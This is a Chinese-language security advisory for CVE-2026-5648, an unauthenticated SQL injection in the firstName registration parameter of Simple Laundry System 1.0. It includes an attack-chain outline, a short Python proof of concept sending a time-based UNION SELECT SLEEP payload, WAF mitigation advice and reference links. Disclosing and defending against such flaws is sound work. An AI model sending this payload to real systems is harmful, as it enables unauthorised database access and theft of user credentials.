CVE-2026-5648 CVSS 7.3 高危

CVE-2026-5648 Simple Laundry System SQL注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5648

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Laundry System

漏洞概述

code-projects Simple Laundry System 1.0存在安全漏洞，位于/userfinishregister.php文件的参数处理组件中。由于程序未对用户输入的firstName参数进行严格的过滤和验证，导致出现了SQL注入漏洞。未经身份认证的远程攻击者可以通过发送特制的恶意请求利用此漏洞，执行任意SQL命令，进而窃取敏感数据、篡改数据库内容或破坏服务可用性。鉴于利用代码已公开，建议尽快修复。

技术细节

该漏洞属于典型的SQL注入漏洞。在Simple Laundry System 1.0的/userfinishregister.php文件中，处理用户注册逻辑的“Parameter Handler”组件直接将用户提交的firstName参数拼接到SQL查询语句中，而未使用预编译语句或有效的输入过滤机制。攻击者无需进行用户交互或身份验证（PR:N/UI:N），即可通过网络发送包含恶意SQL载荷的HTTP请求。由于后端数据库将输入视为代码执行，攻击者能够读取、修改或删除数据库中的任意数据。CVSS 3.1评分为7.3，反映了其对机密性、完整性和可用性的综合影响，攻击复杂度低，危害性大。

攻击链分析

STEP 1

侦察与发现

攻击者通过网络扫描发现目标站点运行的是Simple Laundry System 1.0，并确认存在/userfinishregister.php接口。

STEP 2

构造攻击载荷

攻击者针对firstName参数构造恶意的SQL注入Payload，例如利用UNION SELECT或布尔盲注语句。

STEP 3

发送恶意请求

攻击者向目标服务器发送包含恶意Payload的HTTP POST请求，无需经过身份验证。

STEP 4

执行注入攻击

后端数据库接收到未经过滤的参数，直接执行攻击者注入的SQL命令。

STEP 5

获取数据或破坏

攻击者利用SQL注入漏洞提取数据库中的敏感信息（如用户凭证），或篡改、删除数据，导致系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-5648 Simple Laundry System SQL Injection
# Target: /userfinishregister.php
# Parameter: firstName

target_url = "http://target-host/userfinishregister.php"

# Malicious payload to test for SQL injection (Time-based)
payload = "test' UNION SELECT SLEEP(5), null, null, null-- -"

data = {
    "firstName": payload,
    "lastName": "test",
    "username": "testuser",
    "password": "password"
}

try:
    response = requests.post(target_url, data=data)
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerability confirmed: Response time delayed.")
    else:
        print("[-] Target may not be vulnerable.")
except Exception as e:
    print(f"Error connecting to target: {e}")

影响范围

code-projects Simple Laundry System 1.0

防御指南

临时缓解措施

在无法立即升级或修补代码的情况下，建议在Web应用防火墙（WAF）中部署规则，拦截针对/userfinishregister.php接口的异常SQL关键字（如UNION, SELECT, SLEEP等）。同时，应暂时禁用该页面的对外访问或通过IP白名单限制访问，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5648
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5648
3 Details https://www.cvedetails.com/cve/CVE-2026-5648/
4 VulDB https://vuldb.com/cve/CVE-2026-5648
5 Link https://code-projects.org/
6 Link https://github.com/yao536/cve/issues/2
7 Link https://vuldb.com/submit/786194
8 Link https://vuldb.com/vuln/355436
9 Link https://vuldb.com/vuln/355436/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表